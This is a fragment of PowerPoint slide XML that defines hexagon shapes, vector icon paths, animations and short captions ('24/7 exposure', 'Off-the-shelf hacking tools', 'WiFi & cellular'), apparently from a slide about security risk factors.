                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="TextBox 195"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4179148" y="3452637"/>
            <a:ext cx="1295400" cy="46166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bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>24/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>exposure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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98" name="TextBox 197"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3480648" y="4605633"/>
            <a:ext cx="1295400" cy="69249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bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Off-the-shelf hacking</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Rectangle 251"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="14176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3" name="Hexagon 192"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3377016" y="1764182"/>
            <a:ext cx="1502664" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon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vert270" lIns="0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Hexagon 200"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4790948" y="1764182"/>
            <a:ext cx="1502664" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="466368">
              <a:alpha val="7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0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Lato Regular"/>
              <a:cs typeface="Lato Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="TextBox 193"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3480648" y="2065633"/>
            <a:ext cx="1295400" cy="69249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500" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>WiFi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>cellular</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="Picture 60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8849" y="6407797"/>
            <a:ext cx="1499644" cy="383267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732905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7"/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3"/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" grpId="0" animBg="1"/>
      <p:bldP spid="195" grpId="1" animBg="1"/>
      <p:bldP spid="197" grpId="0" animBg="1"/>
      <p:bldP spid="197" grpId="1" animBg="1"/>
      <p:bldP spid="199" grpId="0" animBg="1"/>
      <p:bldP spid="199" grpId="1" animBg="1"/>
      <p:bldP spid="200" grpId="0"/>
      <p:bldP spid="202" grpId="0"/>
      <p:bldP spid="196" grpId="0"/>
      <p:bldP spid="196" grpId="1"/>
      <p:bldP spid="198" grpId="0"/>
      <p:bldP spid="198" grpId="1"/>
      <p:bldP spid="193" grpId="0" animBg="1"/>
      <p:bldP spid="193" grpId="1" animBg="1"/>
      <p:bldP spid="201" grpId="0" animBg="1"/>
      <p:bldP spid="201" grpId="1" animBg="1"/>
      <p:bldP spid="194" grpId="0"/>
      <p:bldP spid="194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8431" y="3524861"/>
            <a:ext cx="2629525" cy="5353016"/>
            <a:chOff x="-18431" y="3524861"/>
            <a:chExt cx="2629525" cy="5353016"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="99" name="Group 98"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="615850" y="3672077"/>
              <a:ext cx="1929467" cy="2241124"/>
              <a:chOff x="5754688" y="1204913"/>
              <a:chExt cx="1955800" cy="2271712"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="155" name="Freeform 36"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5754688" y="1204913"/>
                <a:ext cx="222250" cy="284162"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 616"/>
                  <a:gd name="T1" fmla="*/ 640 h 788"/>
                  <a:gd name="T2" fmla="*/ 43 w 616"/>
                  <a:gd name="T3" fmla="*/ 556 h 788"/>
                  <a:gd name="T4" fmla="*/ 69 w 616"/>
                  <a:gd name="T5" fmla="*/ 520 h 788"/>
                  <a:gd name="T6" fmla="*/ 95 w 616"/>
                  <a:gd name="T7" fmla="*/ 488 h 788"/>
                  <a:gd name="T8" fmla="*/ 168 w 616"/>
                  <a:gd name="T9" fmla="*/ 436 h 788"/>
                  <a:gd name="T10" fmla="*/ 211 w 616"/>
                  <a:gd name="T11" fmla="*/ 409 h 788"/>
                  <a:gd name="T12" fmla="*/ 337 w 616"/>
                  <a:gd name="T13" fmla="*/ 352 h 788"/>
                  <a:gd name="T14" fmla="*/ 389 w 616"/>
                  <a:gd name="T15" fmla="*/ 330 h 788"/>
                  <a:gd name="T16" fmla="*/ 421 w 616"/>
                  <a:gd name="T17" fmla="*/ 299 h 788"/>
                  <a:gd name="T18" fmla="*/ 436 w 616"/>
                  <a:gd name="T19" fmla="*/ 283 h 788"/>
                  <a:gd name="T20" fmla="*/ 447 w 616"/>
                  <a:gd name="T21" fmla="*/ 267 h 788"/>
                  <a:gd name="T22" fmla="*/ 462 w 616"/>
                  <a:gd name="T23" fmla="*/ 220 h 788"/>
                  <a:gd name="T24" fmla="*/ 473 w 616"/>
                  <a:gd name="T25" fmla="*/ 163 h 788"/>
                  <a:gd name="T26" fmla="*/ 462 w 616"/>
                  <a:gd name="T27" fmla="*/ 136 h 788"/>
                  <a:gd name="T28" fmla="*/ 441 w 616"/>
                  <a:gd name="T29" fmla="*/ 115 h 788"/>
                  <a:gd name="T30" fmla="*/ 426 w 616"/>
                  <a:gd name="T31" fmla="*/ 110 h 788"/>
                  <a:gd name="T32" fmla="*/ 378 w 616"/>
                  <a:gd name="T33" fmla="*/ 105 h 788"/>
                  <a:gd name="T34" fmla="*/ 363 w 616"/>
                  <a:gd name="T35" fmla="*/ 115 h 788"/>
                  <a:gd name="T36" fmla="*/ 347 w 616"/>
                  <a:gd name="T37" fmla="*/ 126 h 788"/>
                  <a:gd name="T38" fmla="*/ 321 w 616"/>
                  <a:gd name="T39" fmla="*/ 168 h 788"/>
                  <a:gd name="T40" fmla="*/ 300 w 616"/>
                  <a:gd name="T41" fmla="*/ 220 h 788"/>
                  <a:gd name="T42" fmla="*/ 174 w 616"/>
                  <a:gd name="T43" fmla="*/ 147 h 788"/>
                  <a:gd name="T44" fmla="*/ 190 w 616"/>
                  <a:gd name="T45" fmla="*/ 99 h 788"/>
                  <a:gd name="T46" fmla="*/ 242 w 616"/>
                  <a:gd name="T47" fmla="*/ 36 h 788"/>
                  <a:gd name="T48" fmla="*/ 279 w 616"/>
                  <a:gd name="T49" fmla="*/ 16 h 788"/>
                  <a:gd name="T50" fmla="*/ 357 w 616"/>
                  <a:gd name="T51" fmla="*/ 0 h 788"/>
                  <a:gd name="T52" fmla="*/ 457 w 616"/>
                  <a:gd name="T53" fmla="*/ 16 h 788"/>
                  <a:gd name="T54" fmla="*/ 504 w 616"/>
                  <a:gd name="T55" fmla="*/ 36 h 788"/>
                  <a:gd name="T56" fmla="*/ 578 w 616"/>
                  <a:gd name="T57" fmla="*/ 89 h 788"/>
                  <a:gd name="T58" fmla="*/ 599 w 616"/>
                  <a:gd name="T59" fmla="*/ 120 h 788"/>
                  <a:gd name="T60" fmla="*/ 615 w 616"/>
                  <a:gd name="T61" fmla="*/ 194 h 788"/>
                  <a:gd name="T62" fmla="*/ 599 w 616"/>
                  <a:gd name="T63" fmla="*/ 278 h 788"/>
                  <a:gd name="T64" fmla="*/ 588 w 616"/>
                  <a:gd name="T65" fmla="*/ 309 h 788"/>
                  <a:gd name="T66" fmla="*/ 573 w 616"/>
                  <a:gd name="T67" fmla="*/ 341 h 788"/>
                  <a:gd name="T68" fmla="*/ 536 w 616"/>
                  <a:gd name="T69" fmla="*/ 388 h 788"/>
                  <a:gd name="T70" fmla="*/ 515 w 616"/>
                  <a:gd name="T71" fmla="*/ 409 h 788"/>
                  <a:gd name="T72" fmla="*/ 484 w 616"/>
                  <a:gd name="T73" fmla="*/ 430 h 788"/>
                  <a:gd name="T74" fmla="*/ 315 w 616"/>
                  <a:gd name="T75" fmla="*/ 509 h 788"/>
                  <a:gd name="T76" fmla="*/ 274 w 616"/>
                  <a:gd name="T77" fmla="*/ 530 h 788"/>
                  <a:gd name="T78" fmla="*/ 247 w 616"/>
                  <a:gd name="T79" fmla="*/ 546 h 788"/>
                  <a:gd name="T80" fmla="*/ 205 w 616"/>
                  <a:gd name="T81" fmla="*/ 588 h 788"/>
                  <a:gd name="T82" fmla="*/ 431 w 616"/>
                  <a:gd name="T83" fmla="*/ 787 h 7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616" h="788">
                    <a:moveTo>
                      <a:pt x="0" y="640"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="64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6" name="Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5935663" y="1444625"/>
                <a:ext cx="68262" cy="73025"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 191"/>
                  <a:gd name="T1" fmla="*/ 204 h 205"/>
                  <a:gd name="T2" fmla="*/ 0 w 191"/>
                  <a:gd name="T3" fmla="*/ 152 h 205"/>
                  <a:gd name="T4" fmla="*/ 58 w 191"/>
                  <a:gd name="T5" fmla="*/ 0 h 205"/>
                  <a:gd name="T6" fmla="*/ 190 w 191"/>
                  <a:gd name="T7" fmla="*/ 52 h 205"/>
                  <a:gd name="T8" fmla="*/ 127 w 191"/>
                  <a:gd name="T9" fmla="*/ 204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1" h="205">
                    <a:moveTo>
                      <a:pt x="127" y="204"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="204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7" name="Freeform 38"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6094413" y="1331913"/>
                <a:ext cx="282575" cy="317500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 426 w 783"/>
                  <a:gd name="T1" fmla="*/ 614 h 883"/>
                  <a:gd name="T2" fmla="*/ 426 w 783"/>
                  <a:gd name="T3" fmla="*/ 614 h 883"/>
                  <a:gd name="T4" fmla="*/ 662 w 783"/>
                  <a:gd name="T5" fmla="*/ 162 h 883"/>
                  <a:gd name="T6" fmla="*/ 782 w 783"/>
                  <a:gd name="T7" fmla="*/ 225 h 883"/>
                  <a:gd name="T8" fmla="*/ 441 w 783"/>
                  <a:gd name="T9" fmla="*/ 882 h 883"/>
                  <a:gd name="T10" fmla="*/ 289 w 783"/>
                  <a:gd name="T11" fmla="*/ 803 h 883"/>
                  <a:gd name="T12" fmla="*/ 368 w 783"/>
                  <a:gd name="T13" fmla="*/ 257 h 883"/>
                  <a:gd name="T14" fmla="*/ 363 w 783"/>
                  <a:gd name="T15" fmla="*/ 257 h 883"/>
                  <a:gd name="T16" fmla="*/ 127 w 783"/>
                  <a:gd name="T17" fmla="*/ 719 h 883"/>
                  <a:gd name="T18" fmla="*/ 0 w 783"/>
                  <a:gd name="T19" fmla="*/ 656 h 883"/>
                  <a:gd name="T20" fmla="*/ 347 w 783"/>
                  <a:gd name="T21" fmla="*/ 0 h 883"/>
                  <a:gd name="T22" fmla="*/ 499 w 783"/>
                  <a:gd name="T23" fmla="*/ 78 h 883"/>
                  <a:gd name="T24" fmla="*/ 426 w 783"/>
                  <a:gd name="T25" fmla="*/ 614 h 8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83" h="883">
                    <a:moveTo>
                      <a:pt x="426" y="614"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="426" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="782" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="803"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="614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8" name="Freeform 39"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6296025" y="1512888"/>
                <a:ext cx="188913" cy="207962"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 168 w 526"/>
                  <a:gd name="T1" fmla="*/ 305 h 579"/>
                  <a:gd name="T2" fmla="*/ 142 w 526"/>
                  <a:gd name="T3" fmla="*/ 347 h 579"/>
                  <a:gd name="T4" fmla="*/ 131 w 526"/>
                  <a:gd name="T5" fmla="*/ 389 h 579"/>
                  <a:gd name="T6" fmla="*/ 137 w 526"/>
                  <a:gd name="T7" fmla="*/ 426 h 579"/>
                  <a:gd name="T8" fmla="*/ 142 w 526"/>
                  <a:gd name="T9" fmla="*/ 441 h 579"/>
                  <a:gd name="T10" fmla="*/ 158 w 526"/>
                  <a:gd name="T11" fmla="*/ 452 h 579"/>
                  <a:gd name="T12" fmla="*/ 189 w 526"/>
                  <a:gd name="T13" fmla="*/ 463 h 579"/>
                  <a:gd name="T14" fmla="*/ 215 w 526"/>
                  <a:gd name="T15" fmla="*/ 457 h 579"/>
                  <a:gd name="T16" fmla="*/ 247 w 526"/>
                  <a:gd name="T17" fmla="*/ 441 h 579"/>
                  <a:gd name="T18" fmla="*/ 389 w 526"/>
                  <a:gd name="T19" fmla="*/ 473 h 579"/>
                  <a:gd name="T20" fmla="*/ 357 w 526"/>
                  <a:gd name="T21" fmla="*/ 510 h 579"/>
                  <a:gd name="T22" fmla="*/ 299 w 526"/>
                  <a:gd name="T23" fmla="*/ 557 h 579"/>
                  <a:gd name="T24" fmla="*/ 262 w 526"/>
                  <a:gd name="T25" fmla="*/ 573 h 579"/>
                  <a:gd name="T26" fmla="*/ 195 w 526"/>
                  <a:gd name="T27" fmla="*/ 573 h 579"/>
                  <a:gd name="T28" fmla="*/ 110 w 526"/>
                  <a:gd name="T29" fmla="*/ 536 h 579"/>
                  <a:gd name="T30" fmla="*/ 78 w 526"/>
                  <a:gd name="T31" fmla="*/ 515 h 579"/>
                  <a:gd name="T32" fmla="*/ 31 w 526"/>
                  <a:gd name="T33" fmla="*/ 473 h 579"/>
                  <a:gd name="T34" fmla="*/ 21 w 526"/>
                  <a:gd name="T35" fmla="*/ 447 h 579"/>
                  <a:gd name="T36" fmla="*/ 5 w 526"/>
                  <a:gd name="T37" fmla="*/ 405 h 579"/>
                  <a:gd name="T38" fmla="*/ 0 w 526"/>
                  <a:gd name="T39" fmla="*/ 357 h 579"/>
                  <a:gd name="T40" fmla="*/ 11 w 526"/>
                  <a:gd name="T41" fmla="*/ 310 h 579"/>
                  <a:gd name="T42" fmla="*/ 31 w 526"/>
                  <a:gd name="T43" fmla="*/ 263 h 579"/>
                  <a:gd name="T44" fmla="*/ 84 w 526"/>
                  <a:gd name="T45" fmla="*/ 169 h 579"/>
                  <a:gd name="T46" fmla="*/ 147 w 526"/>
                  <a:gd name="T47" fmla="*/ 79 h 579"/>
                  <a:gd name="T48" fmla="*/ 184 w 526"/>
                  <a:gd name="T49" fmla="*/ 48 h 579"/>
                  <a:gd name="T50" fmla="*/ 221 w 526"/>
                  <a:gd name="T51" fmla="*/ 22 h 579"/>
                  <a:gd name="T52" fmla="*/ 268 w 526"/>
                  <a:gd name="T53" fmla="*/ 6 h 579"/>
                  <a:gd name="T54" fmla="*/ 315 w 526"/>
                  <a:gd name="T55" fmla="*/ 0 h 579"/>
                  <a:gd name="T56" fmla="*/ 336 w 526"/>
                  <a:gd name="T57" fmla="*/ 6 h 579"/>
                  <a:gd name="T58" fmla="*/ 394 w 526"/>
                  <a:gd name="T59" fmla="*/ 22 h 579"/>
                  <a:gd name="T60" fmla="*/ 425 w 526"/>
                  <a:gd name="T61" fmla="*/ 42 h 579"/>
                  <a:gd name="T62" fmla="*/ 489 w 526"/>
                  <a:gd name="T63" fmla="*/ 95 h 579"/>
                  <a:gd name="T64" fmla="*/ 499 w 526"/>
                  <a:gd name="T65" fmla="*/ 111 h 579"/>
                  <a:gd name="T66" fmla="*/ 525 w 526"/>
                  <a:gd name="T67" fmla="*/ 195 h 579"/>
                  <a:gd name="T68" fmla="*/ 519 w 526"/>
                  <a:gd name="T69" fmla="*/ 236 h 579"/>
                  <a:gd name="T70" fmla="*/ 504 w 526"/>
                  <a:gd name="T71" fmla="*/ 289 h 579"/>
                  <a:gd name="T72" fmla="*/ 446 w 526"/>
                  <a:gd name="T73" fmla="*/ 389 h 579"/>
                  <a:gd name="T74" fmla="*/ 189 w 526"/>
                  <a:gd name="T75" fmla="*/ 268 h 579"/>
                  <a:gd name="T76" fmla="*/ 389 w 526"/>
                  <a:gd name="T77" fmla="*/ 221 h 579"/>
                  <a:gd name="T78" fmla="*/ 394 w 526"/>
                  <a:gd name="T79" fmla="*/ 200 h 579"/>
                  <a:gd name="T80" fmla="*/ 399 w 526"/>
                  <a:gd name="T81" fmla="*/ 179 h 579"/>
                  <a:gd name="T82" fmla="*/ 394 w 526"/>
                  <a:gd name="T83" fmla="*/ 147 h 579"/>
                  <a:gd name="T84" fmla="*/ 383 w 526"/>
                  <a:gd name="T85" fmla="*/ 132 h 579"/>
                  <a:gd name="T86" fmla="*/ 368 w 526"/>
                  <a:gd name="T87" fmla="*/ 121 h 579"/>
                  <a:gd name="T88" fmla="*/ 331 w 526"/>
                  <a:gd name="T89" fmla="*/ 111 h 579"/>
                  <a:gd name="T90" fmla="*/ 315 w 526"/>
                  <a:gd name="T91" fmla="*/ 116 h 579"/>
                  <a:gd name="T92" fmla="*/ 299 w 526"/>
                  <a:gd name="T93" fmla="*/ 121 h 579"/>
                  <a:gd name="T94" fmla="*/ 273 w 526"/>
                  <a:gd name="T95" fmla="*/ 147 h 579"/>
                  <a:gd name="T96" fmla="*/ 236 w 526"/>
                  <a:gd name="T97" fmla="*/ 195 h 579"/>
